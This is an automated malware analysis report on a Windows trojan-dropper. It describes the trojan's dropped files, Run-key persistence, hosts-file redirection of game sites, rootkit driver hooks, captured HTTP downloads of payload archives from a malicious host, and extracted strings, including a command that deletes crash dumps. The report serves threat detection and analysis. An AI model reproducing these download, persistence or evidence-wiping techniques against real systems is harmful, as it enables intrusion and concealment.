Trojan.Win32.FlyStudio_b6e34f92da

by malwarelabrobot on July 7th, 2017 in Malware Descriptions.

Trojan-Dropper.Win32.Sysn.cequ (Kaspersky), Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, mzpefinder_pcap_file.YR, GenericPhysicalDrive0.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Trojan-PSW, Trojan

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

Dynamic Analysis

Static Analysis

Network Activity

Map

Strings from Dumps

Removals

MD5: b6e34f92da5a3147abd76ed7db41a998
SHA1: b0527daddbd8bacc5f025ae2ceea380cb84ca167
SHA256: 83fe434ed0d5ba16f52ece19883e74476ff140d1bf1e2e86d81c31b0c70fb6a4
SSDeep: 49152:z05vr9B71qHfYRDum0PYFTgim gELi7jAUAx4FLjEce68HhXa9aI/Wlp08fmp9gM:oxr9B1wfoDGPYFMimGYjA3x4VjEY8MUE
Size: 2905046 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2017-04-11 17:17:05
Analyzed on: Windows7 SP1 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

29c2bf.exe:1480

The Trojan injects its code into the following process(es):

%original file name%.exe:3424
2bcd58.exe:3416

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process 29c2bf.exe:1480 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\Config[1].rar (230 bytes)
C:\Windows\System32\drivers\UnlockCallback.sys (5 bytes)
C:\Windows\Temp\1.sys.rar (1810 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\SafeWall[1].rar (2765 bytes)
C:\Windows\Temp\Config.dat (230 bytes)

The Trojan deletes the following file(s):

C:\Windows\System32\drivers\UnlockCallback.sys (0 bytes)

The process %original file name%.exe:3424 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\System32\2bcd58.exe (678 bytes)
C:\Windows\29c2bf.exe (586 bytes)

The process 2bcd58.exe:3416 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\System32\drivers\etc\hosts (826 bytes)

Registry activity

The process 29c2bf.exe:1480 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\29c2bf_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\29c2bf_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\29c2bf_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\29c2bf_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\29c2bf_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\29c2bf_RASMANCS]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\29c2bf_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\29c2bf_RASAPI32]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The Trojan disables automatic startup of the application by deleting the following autorun value:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"windowsw"

The process 2bcd58.exe:3416 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"windowswf" = "C:\Windows\system32\2bcd58.exe"

Dropped PE files

MD5	File path
bc881d19f64bd9748f1b813005dea5b4	c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\SafeWall[1].rar
affb554b9180479f961bfcaa5e3a45af	c:\Windows\29c2bf.exe
e25533277b22c9d342ac26cfebb4f9b8	c:\Windows\System32\2bcd58.exe

HOSTS file anomalies

The Trojan modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses.
The modified file is 2044 bytes in size. The following strings are added to the hosts file listed below:

23.234.10.41	www.45woool.com
23.234.10.41	www.44woool.com
23.234.10.41	www.zhaowoool.com
23.234.10.41	www.zhaocs.com
23.234.10.41	www.8cs.com
23.234.10.41	www.huocs.com
23.234.10.41	www.fireol.com
23.234.10.41	www.jielesh.com
23.234.10.41	www.woool2017.com
23.234.10.41	www.600sf.com
23.234.10.41	www.xlcomic.com
23.234.10.41	www.021sjjc.com
23.234.10.41	www.45ci.com
23.234.10.41	www.bdtiandao.com
23.234.10.41	www.lke5.com
23.234.10.41	www.45woool.org
23.234.10.41	www.zjlscnc.com
23.234.10.41	www.93u.com
23.234.10.41	www.guanmei2008.com
23.234.10.41	www.dtggc.com
23.234.10.41	www.woool2sf.com
23.234.10.41	www.chinahuaman.com
23.234.10.41	www.176fgcqsf.com
23.234.10.41	shaibar.com
23.234.10.41	www.shaibar.com
23.234.10.41	www.ucwoool.com
23.234.10.41	www.65535cs.com
23.234.10.41	www.quwoool.com
23.234.10.41	www.88woool.com
23.234.10.41	woool.sf999.com
23.234.10.41	www.fhdlq.com
23.234.10.41	www.28pk.com
23.234.10.41	www.ggwoool.com
23.234.10.41	www.wooolsf.com
23.234.10.41	www.5b.com
23.234.10.41	119.145.148.100:6769
23.234.10.41	162.212.181.100:6769
23.234.10.41	192.126.127.100:6769
23.234.10.41	www.xcsf8.com
23.234.10.41	www.xz518.cn
23.234.10.41	cq3.wca.com.cn

Rootkit activity

Using the driver "%System%\SafeWall.sys" the Trojan controls loading executable images into a memory by installing the Load image notifier.
The Trojan installs the following kernel-mode hooks:

NtDeviceIoControlFile

Propagation

VersionInfo

Company Name:
Product Name:
Product Version: 1.1.0.0
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.1.0.0
File Description:
Comments:
Language: Chinese (Simplified, PRC)

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
UPX0	4096	1945600	0	0	d41d8cd98f00b204e9800998ecf8427e
UPX1	1949696	2478080	2477056	5.45223	3453f73c1ac1d38e1a6bf6359a594ce6
.rsrc	4427776	249856	249344	4.74224	b0822e02537042aeed35a2b6af52282b
.gda	4677632	4096	1536	0	53e979547d8c2ea86560ac45de08ae25

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://x6.tianyuanfalan.com/Config.rar	139.224.223.3
hxxp://x6.tianyuanfalan.com/SafeWall.rar	139.224.223.3
www.hqkjwy.com	125.77.31.224
teredo.ipv6.microsoft.com	157.56.106.189

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY HTTP Request on Unusual Port Possibly Hostile
ET POLICY PE EXE or DLL Windows file download HTTP

Traffic

GET /Config.rar HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: x6.tianyuanfalan.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: application/octet-stream

Last-Modified: Sat, 13 May 2017 04:35:51 GMT

Accept-Ranges: bytes

ETag: "5b76ba66a2cbd21:0"

Server: Microsoft-IIS/7.0

X-Powered-By: ASP.NET

Date: Thu, 06 Jul 2017 01:38:49 GMT

Content-Length: 230

DAE7BFEB6D50F2585D6DAF04EE36D99..85DD9BB3F9DDDA4B75A3F831316C483..AA9E
771D739E5F5DF7F1EF3ECD1778..A2E0B520A172073197CD5D8FB8CE1BF..9EEDFD315
2A5C1F4C0EFD4F5B5512269..2CDCD7DB10D0DB97C6415E9D1DE270ED..C761AF6432F
A26FCD3B248B5467C39BHTTP/1.1 200 OK..Content-Type: application/octet-s
tream..Last-Modified: Sat, 13 May 2017 04:35:51 GMT..Accept-Ranges: by
tes..ETag: "5b76ba66a2cbd21:0"..Server: Microsoft-IIS/7.0..X-Powered-B
y: ASP.NET..Date: Thu, 06 Jul 2017 01:38:49 GMT..Content-Length: 230..
DAE7BFEB6D50F2585D6DAF04EE36D99..85DD9BB3F9DDDA4B75A3F831316C483..AA9E
771D739E5F5DF7F1EF3ECD1778..A2E0B520A172073197CD5D8FB8CE1BF..9EEDFD315
2A5C1F4C0EFD4F5B5512269..2CDCD7DB10D0DB97C6415E9D1DE270ED..C761AF6432F
A26FCD3B248B5467C39B....

GET /SafeWall.rar HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: x6.tianyuanfalan.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: application/octet-stream

Last-Modified: Wed, 03 May 2017 18:05:56 GMT

Accept-Ranges: bytes

ETag: "feab39e937c4d21:0"

Server: Microsoft-IIS/7.0

X-Powered-By: ASP.NET

Date: Thu, 06 Jul 2017 01:38:52 GMT

Content-Length: 18944
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$...................
..............Y......._.......I.......[.....Rich............PE..L.....
.Y.................(....).....>@*......@...........................
....p*.............................................P@*.<...........
.................P*.h....@...............................A..@.........
...@...............................text....!......."..................
 ..h.rdata.......@.......&..............@..H.data...x.)..P.......*....
..........@...INIT.........@*..................... ....reloc.......P*.
.....4..............@..B..............................................
......................................................................
......................................................................
......................................................................
......................................................................
..........................................................U..QQSVW.}.j
.3....WS.]..]....@......tqWSV......}..U.......3.O....~....t....:...].t
......A@...;.|..}...~&...t..E..M....:..t.......E.C;].t.9}.|.j.V...@...
.._^[....j.V...@...E. E.........h.........h.R.................U..QSW.}
.W.G8>....Gp.....G@.....~...3.;..E.}.......uV......C...h.).... @..3
......f..R..V..Sf..R.....@..VSP..R........G.....p(h.R.....@..Sh....SSS
S.E.P...@...u....@...E.^_[...........U.....W.M..E...E...E......<.t(
<>t$<6t <&t.<dt.<et.<.t.<.t.<.t.<ft.<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_3424:

`.rsrc

.yzLP

t%SVh

t$(SSh

|$D.tm

H%d\z

~%UVW

t.It It

u$SShe

kernel32.dll

$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)

oleaut32.dll

EVariantBadIndexError

u%CNu

MaxKeySize

Invalid key size

%UUUU1E

%UUUU3

5 passes)

1.2.3

DB00735E-CFFB-47E6-B060-BB0D74008B7A

94-401@163.com

ku2.iu

Kernel32.dll

Winhttp.dll

ole32.dll

ntdll.dll

shlwapi.dll

user32.dll

advapi32.dll

psapi.dll

Urlmon.dll

wininet.dll

Wininet.dll

ws2_32.dll

version.dll

ShellExecuteA

GetProcessHeap

MsgWaitForMultipleObjects

GetWindowsDirectoryA

WinHttpCheckPlatform

WinHttpCrackUrl

WinHttpOpen

WinHttpConnect

WinHttpOpenRequest

WinHttpSetTimeouts

WinHttpSetCredentials

WinHttpCloseHandle

WinHttpSetOption

WinHttpAddRequestHeaders

WinHttpSendRequest

WinHttpReceiveResponse

WinHttpQueryDataAvailable

WinHttpReadData

WinHttpQueryHeaders

URLDownloadToFileA

HttpOpenRequestA

HttpSendRequestA

HttpQueryInfoA

RegOpenKeyA

RegCloseKey

DeleteUrlCacheEntry

\Data\Config.ini

2434595645!

127.0.0.1

woool.dat.update

popup.dat

Widget.dll

cliqos.dll

Game.ini

GroupNick0

ServerPort

WidgetContent.IE.dll

.rsrc

9=|

5\pUWSSHYzZ

(}9D%F

]CvL,

VQR`"%U;!

.Be$>;

g21r%Wr0/.Wr%W-, %Wr%*)r%Wr('&Wr%W%$#:v

VXX\.BKj

WudP

A.DNE

%SxI8

Uq.NL;(

.UTX@9

.IY\p,

A.tCDo

~_\.Wl

(.eC:

.WPya

`%Ua`

xs.MI!&

Zc#P%c

.kwFt

*.lrR

\.pL.

el32.dll

>6Qt%c

(()@-3$-

},z%C

l  O%cR

.PA5>C0>2

axKey7

eH.Cl

PJ.J.TXJ.J.\`K

XT.J.JPL%J.JH

hsSH>

8-%X<

;44.fB$

.fZNt

DB00735E-CFFB-47E6-60

94(01@163.

%Y]%F]

Acqui.Rf/

MICKEY

AAD.DJ

O.OPP

%d&&'

W%*.*f

2CNotSupported

96.Ae

mu_.fe,g

_DZwMsg

ELECTED4.MSVCRT

,.PAV

'5X%S

*.* G1

(&07-034/)7

.tp#3

%s:%d/=

.Eh.dE^

keyw

?n.NNn

*.yUW

Gl.chs\S

H.Jk

eg1Key

< 3)20,6

O.rsrc

KERNEL32.DLL

ADVAPI32.dll

COMCTL32.dll

comdlg32.dll

GDI32.dll

OLEAUT32.dll

SHELL32.dll

USER32.dll

WINMM.dll

WINSPOOL.DRV

WS2_32.dll

ReportClientQos

?.mF$

WLBÄ

P.RlN

u.Hs,

%c&px|

5\tUWSSHh

&FtPoq0Hv

#X>.Ptm|t

${E.PH

,H.QB

.Jw'j\Q

0.2A.DNE

"nÎ

!KÀ

~*K.HF

A.tCDH

`@;8x%x

c4 &.ITf

C.kwFt

t]&%uAK

NO.OPK

'&%$$#""!!

W%*.*

gCNotSupported

Resourl

CmdTarf

ECTED4.MSVCRT

B.XPgo

X%Sm'

.*.*o

tH%s<

%s:%d/u%

h.dE7

r.nJg1~_

zcÁ

.r%.hXA

QKey9

.uK97

\ `.ra]

*.exe

hXXp://count25.51yes.com/sa.htm?id=258097168&refe=&location=http://VVV.hqkjwy.com:88/dlqtj.html&color=24x&resolution=1440x900&returning=0&language=undefined&ua=Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36

http=

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Content-Type: application/x-www-form-urlencoded

Adodb.Stream

wshom.ocx

WindowStyle

Hotkey

hXXp://moling.bianqian8228.com:789/

.zunbaoyishu.com/

hXXp://

20170101

\data\woool.dat.update

.SESj

6]%X[tl}T

k\<Ts<\%SHK

_&NI%Xh0U

f%u9]

%DjLhV

\UWSSHh

 "UDp

(.ni0

\k-.dE

>.Ptm|tc

.QTC!

PBi@.HD

%C$$$

[.LUr

D(.YPW

%X@!L

l(%U4:

jF RSSh6

%CIt#

Çc$

}%U4s

A.tCD

9 .pk

xlÕ7

x S%u' J

.PSad

^}%.x2

h.ly&

.hd\R

6.uL/

SFC.kwFt

x%xD?

<#,user32.dll

6ACC.DLLT

[lzndowPr8AkF.eg

hXXp://w

.hqkjwy.c

C:\WIN

102.54.9

38.25.63.10xyp

/.- *)(''&%$$#""!!

%*.*f

.Arm.

*OCmdT"

..HLP

SVCRTgr

X`hB.trp

.PAVC@@)I

%s:%d)

RIFF%x

1.6.7

.Ehho

!Gl.chs\S-

cKey

UrlA3%

}.mKK;

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level="requireAdministrator" uiAccess="false"/> </requestedPrivileges> </security></trustInfo></assembly>PAD

RASAPI32.dll

WININET.dll

.text

`.rdata

@.data

@.reloc

j.Yf;

_tcPVj@

.PjRW

not supported

operation canceled

operation in progress

operation not permitted

operation not supported

operation would block

protocol not supported

address family not supported

broken pipe

function not supported

inappropriate io control operation

InitOnceExecuteOnce

operator

operator ""

operator co_await

?#%X.y

%S#[k

?\\.\SafeWall

/c del /f /s /q c:\windows\minidump\*.*

C:\Windows\MEMORY.DMP

cmd.exe

C:\Windows\Temp\1.sys.rar

C:\Windows\Temp\1.key.rar

%s\SafeWall.sys

hXXp://x6.tianyuanfalan.com/SafeWall.rar

C:\Windows\System32\SafeWall.sys

%s\Drivers\SafeWall.sys

hXXp://x6.tianyuanfalan.com/SafeWall64.rar

C:\Windows\SysWOW64\drivers\SafeWall.sys

hXXp://x6.tianyuanfalan.com/sys.rar

%s\Temp\sys.dat

%s\Temp\sys.key

%s\Temp\sys64.dat

%s\Temp\sys64.key

%s\Drivers\UnlockCallback_x64.sys

C:\Windows\SysWOW64\drivers\UnlockCallback_x64.sys

%s\Drivers\UnlockCallback.sys

C:\Windows\System32\drivers\UnlockCallback.sys

\*.dat

\temp\Config.dat

hXXp://x6.tianyuanfalan.com/Config.rar

SOFTWARE\Microsoft\Windows\CurrentVersion\Run

windowsw

c:\Windows\Flags

C:\Users\dumingqiao\Desktop\Phoenixer\Release\Phoenixer.pdb

.text$di

.text$mn

.text$x

.text$yd

.idata$5

.CRT$XCA

.CRT$XCAA

.CRT$XCC

.CRT$XCL

.CRT$XCU

.CRT$XCZ

.CRT$XIA

.CRT$XIAA

.CRT$XIAC

.CRT$XIC

.CRT$XIZ

.CRT$XLA

.CRT$XLZ

.CRT$XPA

.CRT$XPX

.CRT$XPXA

.CRT$XPZ

.CRT$XTA

.CRT$XTZ

.rdata

.rdata$T

.rdata$r

.rdata$sxdata

.rdata$zzzdbg

.rtc$IAA

.rtc$IZZ

.rtc$TAA

.rtc$TZZ

.xdata$x

.idata$2

.idata$3

.idata$4

.idata$6

.data

.data$r

.tls$

.tls$ZZZ

.rsrc$01

.rsrc$02

KERNEL32.dll

ExitWindowsEx

RegOpenKeyExA

RegDeleteKeyA

urlmon.dll

CertGetNameStringA

CryptMsgGetParam

CertFindCertificateInStore

CertFreeCertificateContext

CertCloseStore

CryptMsgClose

CRYPT32.dll

SHDeleteKeyW

SHLWAPI.dll

imagehlp.dll

PSAPI.DLL

GetCPInfo

.?AU_Crt_new_delete@std@@

h.rdata

H.data

.reloc

c:\users\dumingqiao\desktop\source\objfre_win7_x86\i386\EnumRemoveCmpCallback.pdb

ntoskrnl.exe

7%7U7

.pdata

c:\users\dumingqiao\desktop\source\objfre_win7_amd64\amd64\EnumRemoveCallback.pdb

2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,

/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0D

hXXps://VVV.verisign.com/rpa0

hXXp://ocsp.verisign.com0;

/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0

<VeriSign Class 3 Public Primary Certification Authority - G50

DhXXp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0

hXXps://VVV.verisign.com/cps0*

#hXXp://logo.verisign.com/vslogo.gif04

#hXXp://crl.verisign.com/pca3-g5.crl04

hXXp://ocsp.verisign.com0

pk.x6cs.com

hXXp://pk.x6cs.com:88/

ECInf->Key%x

Hash%x

ECInf->FileBufferLen%d

sf999.com

fhdlq.com

28pk.com

ggwoool.com

wooolsf.com

5b.com

125.88.181.

183.60.200.

45woool.com

44woool.com

zhaowoool.com

zhaocs.com

huocs.com

fireol.com

8cs.com

jielesh.com

woool2017.com

600sf.com

xlcomic.com

021sjjc.com

45ci.com

bdtiandao.com

lke5.com

45woool.org

zjlscnc.com

guanmei2008.com

dtggc.com

93u.com

woool2sf.com

chinahuaman.com

176fgcqsf.com

shaibar.com

ucwoool.com

65535cs.com

quwoool.com

88woool.com

HTTP/1.1 301 Found

Location: %s

c:\users\dumingqiao\desktop\projects\safewall\safewall_x86\objfre_win7_x86\i386\SafeWall.pdb

KeDelayExecutionThread

ZwDeleteKey

ZwOpenKey

KeStallExecutionProcessor

HAL.dll

Hash %x

ECInf->Key %x

ECInf->BB %x

in line:%d

c:\users\dumingqiao\desktop\projects\safewall\safewall_amd64\fucksys.c

at file:%s

c:\users\dumingqiao\desktop\projects\safewall\safewall_amd64\objfre_win7_amd64\amd64\SafeWall64.pdb

<requestedExecutionLevel level='requireAdministrator' uiAccess='false' />

0/070@0_0

9 :0:4:8:<:

8 8$8(8,8

=/>4>;>_>

4 4$4(4,4

;0<@<\<`<|<

Software\chuanshi\web

\Data\config\ItemCfg.INI

\Data\config\default\bestitem.INI

https

Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)

HTTP/1.1

hXXps://

hXXp://VVV.hqkjwy.com:88/h.txt

vreport

windows

Battle.net

$Recycle.Bin

data\woool.dat.update

Software\Microsoft\Windows\ShellNoRoam\MUICache

\0-49-3d.nmp

dWEbo

úG0

n#e.jzPxt

.Dt[:js

U#y.aPKwH

]4O%UMp&

2cpÞ

g^.Lt

=.Rx>/

V=.ev&2

.WKM\-

t%DkT

.rO@]

V.rP?

CE.rC

.NaEb

.qPzM

.oKty[

M.nN-H

fB%s:

Q~(%c

8.Ww4

P.Dy4

" .eXqit

Yh2%Ud

S.jLu

V\jiangjunling01.nmp

\jiangjunling02.nmp

Oi%xK_<

^t%dk

-d}Gt

3s4%U

\wuxing.nmp

%sBdN

%sJdN

:1975/08/21

Http://

VBScript.RegExp

Adobe Photoshop CS2 Windows

2011:12:22 11:54:23

urlTEXT

MsgeTEXT

hXXp://ns.adobe.com/xap/1.0/

<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="3.1.1-111">

<rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">

xmlns:exif="hXXp://ns.adobe.com/exif/1.0/">

xmlns:tiff="hXXp://ns.adobe.com/tiff/1.0/">

xmlns:xap="hXXp://ns.adobe.com/xap/1.0/">

<xap:CreatorTool>Adobe Photoshop CS2 Windows</xap:CreatorTool>

xmlns:xapMM="hXXp://ns.adobe.com/xap/1.0/mm/"

xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#">

<stRef:documentID>adobe:docid:photoshop:4de4def4-ecd0-11e0-9a10-a9350357c235</stRef:documentID>

xmlns:dc="hXXp://purl.org/dc/elements/1.1/">

xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/">

IEC hXXp://VVV.iec.ch

.IEC 61966-2.1 Default RGB colour space - sRGB

CRT curv

.fM,k

.kp:S

?idWF.fE

-0 /2#25"27$6;#7>"7?#=C$@F&CJ*FM-IP0JQ/KQ1MS1NT4PW3OV4PW6RY7SZ8T[6Q[7SZ8TZ7SZ7SZ5QW4QT5QW4OY3PW4QX3PW3PW3PW3PW4QX4PW4PV7SY7SZ6RY7SZ7SZ6RY7SZ8SV4PV3PW2OV4PW5QX4PW3OV3PW4PW3OV5PZ2OV4PW6RX6SZ9SY7SZ7SZ8T[6SY8TZ4PV4PV4PW4PZ4PZ3OY3OY3PW3OY5PZ4NZ5PZ4OY4OY5PZ4OY5QX7SZ:UX7SY7SZ7SZ7SY7SZ6RY-IS4RU4OY:TZ.JT

 .Zv|Qkw

-2#16"27$49"6=$9@$>D&@F(DK)EL,HO-IP0KU2MW3OV3OV3OV5QX6RX7SY7SY7SZ8S]7SZ7SY8TZ3OU5QX4PV4PV1QV0PU3PV4QW2OV3PW1NU4QX3OV7SZ5QX7SZ7SZ6RY8T[6RY7SY3OU5QW4PW4PV5QW5RX3PV4PW6RY3OV5QX4PW3OV7SZ7SZ8T[5QW8U[8TZ5RX6SY4QW3PW3PW5QX3OV5QX4PW5QX5QW4PV3QT3PV3PV3PW5QX3OV5QX6RY7SY7SZ7SZ7SZ8T[9U\8RY0JQ6N[.PV9R\-HT

-2!16"27$49"6=%9@$>E$@G(DK)DN*FP-IS/JT3NX4PW3OV3OV4PW6RY7SZ7SZ7SZ8T[7SY5RX8TZ3OU5QW4PW4PV0PV/OT4QW4QW1NU5RY1NU4QX4PW7SZ6RY6RY7SZ6RY8T[7SZ8T[2NU5QX3OV4PV5QW4RU2PS4PW6RY3OV5QX4PW3OV7SZ7SZ8T[5QW8U[8TZ5RX6SY4QW3PW3PW5QX3OV5QX4PW5QX5QW4PV3PV3PV3PV3PW4PW5QX5QX6RY7SY7SZ7SZ7SZ8T[9U\8RY0JQ6N[.PV9R\-HT

###$$$"""$$$&&&

!!! !!! """ """###!!!

|||___^^^"""

...---,,,---   ,,,,,,,,,......---...,,,---...---///...111...000222000///...000HHHJJJEEEDDD444,,,   111.........111000>>>EEEEEE???444......111   ///???EEEGGGEEE555000000.........111111000---///BBBFFFCCCEEE555000   ,,,,,,...444<<<BBBGGGAAA...------...---///111...---EEEKKKMMMOOO888/////////---   ///000...111   000///***///---,,,///,,,...KKKKKKMMMCCC???333   ***---,,,,,,------...///..................---------//////------///***,,,,,,FFF&&&

???<<<222444555666

777666333777

@@@<<<333888666555

999???@@@???>>>@@@

%%%XXXXXXXXXLLL

...RRR]]]^^^\\\\\\___^^^JJJ

999888666444

888999000

!!!999;;;===:::)))

...vvv

[[[(((&&&|||

]]]___"""

###$$$%%%$$$%%%

 / /2"14"36i&8=$8@%<D'@J'BL)DN,HO.JQ/KR1MT1MW2OV2OV3PW7SZ7SZ7SZ6RY7SY7SY7SY7SY4PW5QX4PW4PW4PW4PW4PW4PW4PW5QX4PW4PW5PZ7R\9SZ9SY9SY9SY7SY7SZ9SY4PW3OY5RY4PW3OV4OY4PZ4OY6PW4PW4PW5QX4PV6RX7SY7SY7SY7SZ7SZ7SZ7SZ4PW5QX4PW5QW4PV4PV5QX3PW4PW7QX4OY5PZ4OY5PZ4PW4PW4PW6RY9SY7SZ7SZ6RY9SY:T[6RY/KU3PW4PZ9SY/KR

05!38#5:%7<&8=%<D&@G*DK*FM,HO.JQ0KU1LV2NU3OV3OV4PW7SY7SY7SY7SZ:T[9SZ6RY8T[3PW5QX4PW4PW5QX4PW4PW4PW4PW4PW4PW4PW5QX7SZ7SZ7SZ7SZ7SZ7SZ7SZ5T]4PZ4OY6OY4OY4OY3PW1QW3NZ3NZ3NZ3NZ3NZ3NZ6Q]7R^9SZ7QX9R\:T[6RY7SZ3NX4OY3OV4PW4PW4PW4PW5QX4PW3PV3PW4QX3OY4OY4OY3NX4PW7SZ9U[6RY7SZ8T[8T[6RY8T[.JQ4QW4PW9TW/JT

)0.JQ 7?Dbm

}}}|||~~~

,,,!!!???...XXX

   ...rrr

......,,,---,,,---------...000......---///...---/////////////////////000...DDDFFFFFFGGG---IIICCCBBB>>>777444...//////000111///222,,,///000......///000555///000000HHHIII<<<000.../////////000...///000   :::FFF777   ,,,......666<<<BBBIII===///------...   ///---...---EEEKKKMMMMMM666000///...---...///111///...---222......,,,,,,000000------JJJKKKNNNFFFAAA111---))),,,,,,...---......///.........///...---,,,,,,---...111,,,,,,000   ,,,,,,EEE&&&

>>>===444555444666

SSSHHH"""

---444333555444

>>>999444666555444

...555:::444666:::

000:::888999:::888<<<888

???@@@===///

...NNN;;;;;;<<<<<<<<<<<<<<<<<<<<<======<<<:::===<<<===>>>===???===>>>===999<<<<<<EEE'''

...SSSGGG))) !!!

...lll!!!

;;;777000

:::999888999

...jjjlllnnnkkklllkkklllnnnjjjnnnkkklllmmmnnnjjj

###%%%###$$$%%%

|||{{{|||}}}~~~|||~~~

!!!###***

@@@```~~~

999(((555>>>

111""">>>$$$

888///,,,

111...///

;;;---111

(((444((()))

EEE444111111...LLL

333   ---   ...OOO

"""'))***$$$

$$$***)))555999)))%%%

222:::888555666[[[

%''(%'$#%

$'#(&&%&(

!!!###$$$(((&&&

"""'''((("""

"""'''   """

$$$%%%'''%%% ###(((***$$$ )))...!!!

!!!888...;;;

!!!&&&!!!

&&&   (((,,,   ,,,)))%%%""" $$$

"""&&&$$$###$$$'''&&&!!!

$$$   ,,,((($$$   &&&

!!!'''"""

$$$'''&&&### %%%$$$

"""'''***'''&&&   $$$

###&&&%%% %%%(((***$$$!!!%%%

'''...111 ###

&&& &"*(('''$$$'''"""

$$$###"""%%%)))'''###)))111555444333

